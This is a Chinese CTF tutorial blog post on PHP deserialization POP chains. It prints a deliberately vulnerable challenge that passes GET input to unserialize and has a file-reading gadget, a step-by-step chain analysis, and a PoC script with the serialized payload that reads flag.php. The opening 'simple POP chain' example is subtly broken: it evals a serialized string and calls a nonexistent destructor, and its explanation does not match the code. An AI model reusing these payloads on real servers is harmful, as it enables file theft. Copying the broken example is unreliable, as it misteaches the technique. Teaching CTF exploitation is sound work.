作者：Eason_LYC
悲观者预言失败，十言九中。 乐观者创造奇迹，一次即可。
一个人的价值，在于他所拥有的。可以不学无术，但不能一无所有！
技术领域：WEB安全、网络攻防
关注WEB安全、网络攻防。我的专栏文章知识点全面细致，逻辑清晰、结合实战，让你在学习路上事半功倍，少走弯路！
个人社区：极乐世界-技术至上
追求技术至上，这是我们理想中的极乐世界~（关注我即可加入社区）

本专栏CTF基础入门系列打破以往CTF速成或就题论题模式。采用系统讲解基础知识+入门题目练习+真题讲解方式。让刚接触CTF的读者真正掌握CTF中各类型知识点，为后续自学或快速刷题备赛，打下坚实的基础~

目前ctf比赛，一般选择php作为首选语言，如读者不了解php的基本语法，请登录相关网站自学下基本语法即可，一般5-7天即可掌握基础。

本文是系列文章，知识点环环相扣，难度依次递增，请首先阅读之前的文章后，再阅读本文效果更加~

1. CTF-PHP反序列化漏洞1-基础知识
2. phpstudy本地环境搭建图文教程
3. CTF-PHP反序列化漏洞2-利用魔法函数

1. POP链学习建议

实话实说，这部分的学习有些难度，特别对于没有编程基础的同学来说，有些难以理解。下面给出这部分学习的一些小tips：

• 学习PHP Pop链需要具备一定的PHP编程和Web安全知识，并需要深入理解PHP的序列化机制和反序列化漏洞的原理。以下是一些学习PHP Pop链的建议：

  1. 学习PHP编程：学习PHP编程是学习PHP Pop链的基础，需要掌握PHP的基本语法和常用函数，了解PHP的面向对象编程和设计模式等。建议网上直接搜类似于菜鸟教程的网站学习5-7天即可。

  2. 学习Web安全知识：学习Web安全知识是理解PHP Pop链攻击原理的必要条件，需要了解Web应用的常见漏洞类型和攻击技术，如SQL注入、XSS、CSRF、反序列化漏洞等。此部分详见我的专题系列文章《WEB安全0基础入门系列》，我个人强推，建议看完我的系列文章，再上官网阅读官方文档。

  3. 深入理解PHP序列化机制：PHP序列化是PHP Pop链攻击的基础，需要深入理解PHP的序列化机制，包括序列化格式、序列化函数和反序列化函数等。本系列文章已详细讲解CTF-PHP反序列化漏洞1-基础知识

  4. 学习PHP Pop链实例：学习PHP Pop链需要了解实际攻击中的Pop链构造方法和技巧，可以参考一些已知的PHP Pop链实例，如ysoserial、PHPGGC等。本篇文章和本系列后续文章

• 实践练习：实践是学习PHP Pop链的关键，可以通过搭建实验环境、编写漏洞利用代码等方式进行实践练习，提升攻击技能和经验。环境搭建，参考本系列文章 phpstudy本地环境搭建图文教程

2. POP链的含义

它是⼀种⾯向属性编程，常⽤于构造调⽤链的⽅法。

PHP反序列化攻击是一种常见的Web攻击，攻击者通过构造恶意的序列化数据，将其传递给目标服务器，从而导致服务器执行非预期的操作。而Pop链则是一种利用PHP反序列化漏洞的攻击方式，可以在未授权的情况下执行任意代码。

Pop链的基本思路是，通过反序列化攻击，构造出一条“链”，让程序依次执行其中的命令，最终实现攻击者想要的目的。Pop链通常是由多个对象序列化数据组成的，每个对象都包含着下一个对象的引用。当程序反序列化第一个对象时，就会自动解析其中的引用，并继续反序列化下一个对象，以此类推，最终执行攻击者希望执行的代码。

Pop链的构造需要一定的技术水平，需要了解PHP的序列化机制和反序列化漏洞的原理。同时，攻击者还需要了解目标系统的环境和配置，才能选择合适的攻击方式。因此，Pop链攻击是一种高级的Web攻击技术，需要攻击者具备较高的技术水平和经验。

在题⽬中的代码⾥找到⼀系列能调⽤的指令，并将这些指令整合成⼀条有逻辑的能达到恶意攻击效果的代码，就是pop链。

反序列化是通过控制对象的属性从⽽实现控制程序的执⾏流程，进⽽达成利⽤本身⽆害的代码进⾏有害操作的⽬的。

也可以这样理解，构造⼀条完整的调⽤链，这条调⽤链与原来代码的调⽤链⼀致，不过部分属性被我们所控制，从⽽达到攻击⽬的。构造的这条链就是POP链。

3. POP链代码示例

下面是一个简单的PHP反序列化Pop链代码：

<?php
class A {
    public $b;
    public function __destruct() {
        eval($this->b);
    }
}

class B {
    public $c;
    public function __destruct() {
        $this->c->__destruct();
    }
}

class C {
    public $cmd;
}

$cmd = 'echo "Hello, world!";';
$c = new C();
$c->cmd = $cmd;

$b = new B();
$b->c = $c;

$a = new A();
$a->b = serialize($b);

$pop_chain = unserialize($a->b);
?>

上述代码中，定义了三个类A、B和C，其中A类包含一个属性b，B类包含一个属性c，C类包含一个属性cmd。在A类的析构函数中，使用eval函数执行B类的属性c中的__destruct函数。在B类的析构函数中，调用C类的__destruct函数。最终，我们将C类的cmd属性设置为要执行的命令，并将B类序列化后赋值给A类的属性b，最终通过反序列化Pop链实现了执行指定命令的目的。

需要注意的是，这只是一个简单的示例代码，实际上构造Pop链需要更多的技术细节和实践经验。攻击者应该遵循合法的道德和法律规范，不得进行非法攻击和侵犯他人隐私的行为。

重点说明

POP链的构造就在于魔法函数的串联使用，在我的第一篇文章中有非常全面的总结和推荐文章，建议比对查看，事半功倍。

4. POP链经典例题(加深理解)

题目环境如何搭建，请参考之前的系列文章 phpstudy本地环境搭建图文教程
代码下方已提供，简单的建个php文件，和flag文件即可搭建题目环境。

• 题目源码

<?php
//flag is in flag.php
error_reporting(1);


class Read {
  
 	public $var;
  
 	public function file_get($value)  //Read类里的危险函数，能读取$value的内容并返回
{	
  	$text = base64_encode(file_get_contents($value));   
 		return $text;
}
  
 public function __invoke(){     // Read类里对象被当成函数处理时⾃动调⽤，此魔法函数调用危险函数
 		$content = $this->file_get($this->var);
 		echo $content;
 }
}

class Show
{
 	public $source;
 	public $str;
  
 	public function __construct($file='index.php')  // 构造Show类实例时调用
 {
 		$this->source = $file;
 		echo $this->source.'Welcome'."<br>";
 }
  
 	public function __toString() // show类的对象被当作字符串处理时调⽤
 {
 		return $this->str['str']->source;
 }
  
 	public function _show()
 {
 		if(preg_match('/gopher|http|ftp|https|dict|\.\.|flag|file/i',$this->source)) {
 		die('hacker');
 } else {
 		highlight_file($this->source);
 }
 }
  
 	public function __wakeup() //show类的对象反序列化时⾃动调⽤
 {
 		if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
 		echo "hacker";
		$this->source = "index.php";
 }
 }
}


class Test
{
 	public $p;
  
 	public function __construct()  // 构造Test类实例时调用
 {
 		$this->p = array();
 }
  
 	public function __get($key) //获取Test类不存在或者不可访问的变量时⾃动调⽤
 {
 		$function = $this->p;
 		return $function();
 }
}


if(isset($_GET['hello']))
{
 unserialize($_GET['hello']);
}
else
{
 $show = new Show('pop3.php');
 $show->_show();
}

• 解题思路

1. 源码中魔法函数的作用详见备注，分析关键点如下
   • 反序列化唯一入口 __wakeup() //show类的对象反序列化时⾃动调⽤
   • 解题关键点 __wakeup() 里调用的函数 preg_match(参数A，参数B)
     参数B被当做字符串处理。这个流程会自动调用该类的魔法函数__toString()
   • 链终点危险函数__invoke()
2. 分析完整思路如下：

// 1. 该题目中反序列调用的魔法方法，只找到一个方法。所以入口一定是Show#__wakeup
public function __wakeup()
 {
 if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
 echo "hacker";
 $this->source = "index.php";
 }
 }

// 2. preg_match 函数第⼆个参数为字符串类型，所以这⾥会将$this->source当作⼀个字符串处理。将触发触发 Show#__tostring()魔术⽅法
public function __toString() //对象被当作字符串处理时调⽤
 {
 return $this->str['str']->source;
 }

// 3. Show#__toString()里的$this->str['str']->source的变量操作，这里可以触发Test#__get($key)魔术方法
 public function __get($key) //获取不存在或者不可访问的变量时⾃动调⽤
 {
 $function = $this->p;
 return $function(); 
 }

// 4. 调⽤$function这个⽅法、函数，也就是将 $this->p 成员变量当作函数来调⽤，这⾥可以触发 __invoke()这个魔术⽅法
public function __invoke(){ //对象被当成函数处理时⾃动调⽤
 $content = $this->file_get($this->var); //调⽤file_get⽅法
 echo $content;
}

// 5. file_get⽅法可以读取任意⽂件，⽂件名为成员变量 $this->var
public function file_get($value)
{
 $text = base64_encode(file_get_contents($value));
 return $text;
}

最终构造的完整POP链（攻击链）如下：

hello -> Show__wakeup -> source -> Show.__toString -> (不存在属性)Test.__get() -> p ->Read.__invoke
// hello是Show的对象，source是Show的对象，str['str']是test的对象,p是Read的对象

3. 构造POC

<?php
class Read{
    public $var='flag.php';
}
class Show
{
 public $source;
 public $str;
}
class Test
{
 public $p;
}

$show = new Show();
$test = new Test();
$read = new Read();

$test->p=$read;
$show->source=$show;
$show->str['str']=$test;
echo serialize($show);
?>
  
// 结果
// O:4:"Show":2:{s:6:"source";r:1;s:3:"str";a:1:{s:3:"str";O:4:"Test":1:{s:1:"p";O:4:"Read":1:{s:3:"var";s:8:"flag.php";}}}}

总结
POP链：unserialize函数（变量可控）–>wakeup()魔术⽅法–>tostring()魔术⽅法–>get魔术⽅法–>invoke魔术⽅法–>触发Read类中的file_get⽅法–>触发file_get_contents函数读取flag.php

下篇文章将继续介绍pop链的相关题目，